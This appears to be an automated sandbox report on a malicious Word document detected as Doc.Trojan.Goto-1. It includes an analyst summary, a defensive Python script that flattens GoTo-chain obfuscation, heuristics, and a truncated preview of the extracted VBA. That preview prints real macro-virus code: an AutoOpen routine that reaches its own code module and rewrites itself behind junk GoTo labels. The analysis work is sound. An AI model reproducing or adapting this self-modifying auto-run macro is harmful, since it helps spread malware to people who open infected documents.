MALICIOUS
Risk Score: 200
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic
The sample is a malicious OLE (Word) document with an AutoOpen VBA macro; a legacy WordBasic auto-exec marker is also present (see heuristics). The extracted VBA is heavily obfuscated with long chains of unconditional GoTo statements and throwaway labels, plus string concatenation, so the source order of the statements does not match their execution order and the payload is hard to read statically. What is visible is notable on its own: the macro obtains a handle to its own code module via Application.VBE.ActiveVBProject.VBComponents("Module1").CodeModule, calls Randomize, and its variable comments describe counting GoTo statements and choosing positions at which to insert GoTo statements and labels. That is consistent with a self-modifying macro that rewrites its own source on each run (the leftover "1: End of Declarations" style MsgBox calls look like the author's debugging output), not with a plain downloader. Together with the AutoOpen trigger and the ClamAV detection (Doc.Trojan.Goto-1) this supports the malicious verdict; nothing in the extracted code shown here downloads or executes a secondary payload, so that remains unconfirmed.
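As an added example (not the analyzer's code and not the sample's), the following Python script shows how an analyst can undo this class of obfuscation on source extracted with olevba: it walks the macro the way the VBA interpreter would, following every unconditional GoTo and dropping label lines, so the real statements come out in execution order; it also counts the GoTo/label noise and flags the self-modification markers seen in the preview (Application.VBE, VBComponents, CodeModule, Randomize). SAMPLE_MACRO is constructed here in the style of the extracted macro, with eleven real statements hidden behind six GoTo/label pairs; the marker list is the author's own choice, not an olevba or ClamAV rule. Conditional jumps (If ... GoTo, On Error GoTo) and loops built from GoTo are out of scope: the walker stops when it revisits a line or cannot resolve a label.

```python
import re
from typing import Dict, List

# Constructed sample in the style of the extracted macro (not the page's
# code): real statements interleaved with GoTo/label pairs so that source
# order no longer matches execution order.
SAMPLE_MACRO = """\
Sub AutoOpen()
Dim gto% 'number of goto's
Set cm = Application.VBE.ActiveVBProject.VBComponents("Module1").CodeModule
Randomize
GoTo eddmfgjqdAdhEb
plefdrahbAcgIb:
lb = 7
GoTo MfEaaKBNLeg
eFlbhcILgagbcqD:
lbl2 = lbl2 & ch2
GoTo KqiMtUN
MfEaaKBNLeg:
For i = 1 To gto
GoTo aVebacSBdeibhiF
eddmfgjqdAdhEb:
gto = 5
GoTo plefdrahbAcgIb
aVebacSBdeibhiF:
ch2 = "x"
GoTo eFlbhcILgagbcqD
KqiMtUN:
Next i
End Sub
"""

GOTO_RE = re.compile(r"^\s*GoTo\s+([A-Za-z_]\w*)\s*$", re.IGNORECASE)
LABEL_RE = re.compile(r"^\s*([A-Za-z_]\w*):\s*$")

# Hypothetical analyst list of markers for a macro that reads or rewrites its
# own VBA project, chosen from what the previewed code actually calls.
SELF_MOD_MARKERS = ("Application.VBE", ".VBComponents(", ".CodeModule", "Randomize")


def split_lines(src: str) -> List[str]:
    """Non-blank lines of the macro, trailing whitespace removed."""
    return [ln.rstrip() for ln in src.splitlines() if ln.strip()]


def obfuscation_stats(src: str) -> Dict[str, int]:
    """How much of the source is GoTo/label padding versus real statements."""
    lines = split_lines(src)
    gotos = sum(1 for ln in lines if GOTO_RE.match(ln))
    labels = sum(1 for ln in lines if LABEL_RE.match(ln))
    return {"lines": len(lines), "gotos": gotos, "labels": labels,
            "statements": len(lines) - gotos - labels}


def self_modification_markers(src: str) -> List[str]:
    """Markers present in the source, in SELF_MOD_MARKERS order."""
    return [m for m in SELF_MOD_MARKERS if m in src]


def flatten_goto_chain(src: str) -> List[str]:
    """Recover statements in execution order by following unconditional
    GoTo jumps and skipping label lines. Stops at End Sub/End Function, at a
    revisited line (a genuine GoTo loop rather than inserted padding) or at
    a GoTo whose label does not exist."""
    lines = split_lines(src)
    targets = {}  # label name (VBA labels are case-insensitive) -> line index
    for idx, ln in enumerate(lines):
        m = LABEL_RE.match(ln)
        if m:
            targets[m.group(1).lower()] = idx
    path, seen, pc = [], set(), 0
    while pc < len(lines) and pc not in seen:
        seen.add(pc)
        ln = lines[pc]
        m = GOTO_RE.match(ln)
        if m:
            name = m.group(1).lower()
            if name not in targets:
                path.append(f"' unresolved GoTo {m.group(1)}")
                break
            pc = targets[name]  # jump: the label line itself is skipped next
            continue
        if not LABEL_RE.match(ln):
            path.append(ln.strip())
            if ln.strip().lower() in ("end sub", "end function"):
                break
        pc += 1
    return path


if __name__ == "__main__":
    print(obfuscation_stats(SAMPLE_MACRO))
    print(self_modification_markers(SAMPLE_MACRO))
    print("\n".join(flatten_goto_chain(SAMPLE_MACRO)))
```

On the real macros.bas, read the file and pass its text to flatten_goto_chain; obfuscation_stats alone is a useful triage signal, since a module where GoTo and label lines outnumber real statements many times over is itself characteristic of this family.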
Heuristics (4)
- ClamAV: Doc.Trojan.Goto-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Goto-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54286 bytes | 1f356f28537d52bbcb3817844de59b26f51548843b197c6fca7fc87fbe4f5426 | ClamAV: Doc.Trojan.Goto-1; Obfuscation or payload: unlikely |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim gto% 'number of goto's
Dim i% 'i
Dim x% 'x
Dim lb% 'number of char's in label
Dim pos% 'position to put goto's at
Dim pos2% 'position to put the labels at
Dim ch$ 'char var
Dim ch2$ 'char2 var
Dim ch3$ 'char3 var
Dim lbl$ 'label var
Dim lbl2$ 'label2 var
Dim lbl3$ 'label3 var
Dim buf$ 'buffer
Set cm = Application.VBE.ActiveVBProject.VBComponents("Module1").CodeModule
Call MsgBox("1: End of Declarations", vbOKOnly)
Randomize
pos = cm.CountOfLines / (Int(6 - 4) * Rnd + 4) - 2
GoTo eddmfgjqdAdhEb
plefdrahbAcgIb:
GoTo EgIbsFCIFfg
MfEaaKBNLeg:
For i = 1 To gto
Call MsgBox("2: Start of gto loop", vbOKOnly)
GoTo aVebacSBdeibhiF
eFlbhcILgagbcqD:
Call MsgBox("3: Start of lb loop", vbOKOnly)
For x = 1 To lb
GoTo DumJfHG
KqiMtUN:
GoTo udADchg
ogDFhft:
GoTo WdfMpAB
DumJfHG:
GoTo OjKeceqKEMkKeC
GoTo biCHBaITiFAPbHdF
pfFECbQCeWBDpMaD:
lbl2 = lbl2 & ch2
GoTo CfAdfqkLNMdDeE
OjKeceqKEMkKeC:
GoTo ANQAdkA
GJQEffE:
GoTo eSdPBORADec
dQaHARHDLhd:
GoTo baeDD
dagEA:
GoTo KHEabDNEcAcaeBEejBQ
GoTo LtGBb
FgCJa:
GoTo GbGAgmComJC
OlAJnrKmaFJ:
GoTo BaFEd
McFFk:
GoTo AoDeBDasjPFpgNjCDfabF
AbKtEEtdlRJnrCcFAnagS:
GoTo PbmCnsIBKMAedkbibBBd
DqbLqbDEEKAqxqaatEBd:
GoTo LePcgcObBjipGahpd
AiDcjfYjQgqgEgfbd:
GoTo KEcdQboleDcDLEmc
ELjlFjpdaBlECRle:
GoTo AXcRbaqb
BCdGiucl:
GoTo kbqMJDdfFceaeB
accOAGaiCebfhI:
GoTo EfiNgEEcBKaaP
PaaOfCEjALooL:
GoTo epbKFHdoFdjwbO
kbqMJDdfFceaeB:
GoTo eusBgecIafgIk
ogbNcqaKcaoHb:
GoTo bhkBdbsxCcEgHbddGAqBfk
ohbMdbguEaMkAlbaNIcDas:
NCmhBejhaItNCBfn:
GoTo HahCgJhfDvBgCHhGIC
GfdHaAagJaSnGAuDGE:
DAVBNIc:
GoTo CkaArGdaCtBcAMmBIO
HahCgJhfDvBgCHhGIC:
GoTo cCMGbdIhHElcCAd
bNFDbaCjBDfdKCc:
GoTo INeAMeUFDjmKIvmmj
DEgCIbIGJbcIHfaib:
GoTo bAAAbkAnCEbdFEb
cCMGbdIhHElcCAd:
GoTo cISjodS
lABcjlB:
dSEBKAsadh:
GoTo iRFumkA
cISjodS:
GoTo YDAJLALbia
FBCEGDThkd:
GoTo noeFAHISaerKkFpBjCm
gdwFADFIbcaFeCnEqBj:
GoTo HADOFPJana
YDAJLALbia:
GoTo GpefFSSbF
EbqeEIEiB:
CmaBaoeEeaRRbAGPHcoqEA:
GoTo GAMgcCtKdk
GoTo JqaBdcfAlmIAbRFNGpaaEN
HobHygeBbeCCcMCBLhhdKJ:
GoTo qBDIiChbKgN
cDAAgEdbOoJ:
eJmmtgOP:
dByfcdEl:
GoTo nRgBgEkKJccvA
pJaEoIdQTbftA:
aibjAdqBAjEimAEicF:
dCNbccaDcAJUld:
GoTo rjbmAocEFjPsdABguP
bbgeAsgLBfAhfCCnbE:
GoTo PCoAAcACPME
EAaPFbUBTEV:
GoTo lABcjlB
GoTo hhkkHV
uknaCI:
GoTo gwiGJgDaBmdhO
GoTo lfmbNA
hhkkHV:
GoTo CPKmAMqaAfdQi
EFSkRAndAecHb:
fPatApDagHnbiLvFsbly:
rjffAcEceBGrAagAdmcDC:
GoTo lCicIrMibJakhDjEajkm
bBybGbFedDemcLaFbcde:
GoTo AIEga
CJBtc:
GoTo BCdGiucl
GoTo cDidFBoiB
dHcjGFebO:
hvCAGJAhAICFEjCpQkeAQ:
GoTo fBhbADciX
cDidFBoiB:
GoTo EjadbCDedPOu
GnqibGIdaGAc:
GoTo KGkcbfpAuHmhFUccajb
GoTo OacceDBesBCb
EjadbCDedPOu:
GoTo EFsisFMdf
DIaahBAel:
LgcaEevbcc:
GoTo ABKSccNfGBh
GoTo BIbeCnGOaOjDbkGcaAJHI
CQlcAaOEbIhRggGcdDBMH:
DqgaEhulnw:
GoTo aAAIBFCaCGM
mNFONGTdCEF:
GoTo SJccfgECam
GoTo ibbbfMgNeBLdgKfbRE
gnlgeJmHdPEncBabHE:
HjbNCCaAPl:
GoTo aabgDEnabAcia
hgexAAlbcMkkh:
GSIQciC:
GoTo egpfDHgczXicc
aabgDEnabAcia:
GoTo auIqq
tqGgc:
HaAIlmrdccJOmg:
GoTo bcEnh
auIqq:
GoTo bGoBTdEScBdBBLAfabDP
aUfDNhDHbDlAEFCmeyST:
bCrdegIE:
GoTo aIiUChBBkIkDAABejbAL
bGoBTdEScBdBBLAfabDP:
GoTo GVmdDlEAcSdJdmTgaJJQB
BIbeCnGOaOjDbkGcaAJHI:
GoTo BddfBauikf
GoTo CQlcAaOEbIhRggGcdDBMH
GVmdDlEAcSdJdmTgaJJQB:
GoTo jbdkjFoEeKCirJdcDH
ibbbfMgNeBLdgKfbRE:
GoTo LKAded
CDTedd:
hDbgDLLwdfDebNkbCcABa:
GoTo CJBtc
GoTo cAcaBFCcdfNboHduKrELe
gHmaBOJhidBixJfcGaDAl:
GoTo aJacH
hHdcH:
GoTo HchcbcbCDHamc
GoTo eNASDbAGn
cIKHUaDPb:
ADddD:
GoTo lcHHAKEfAAINDkCkMirEU
GoTo SDatB
BAmcH:
GoTo kBbIaAAaJaDmandEKt
rBaCeHAdGgQiknpBEo:
GoTo OlAJnrKmaFJ
GoTo udRKfMHlLcDbKWJcJf
kfCSoKFdJbDiEEBaFn:
alGbK:
GoTo qjBCcGPaJ
... (truncated)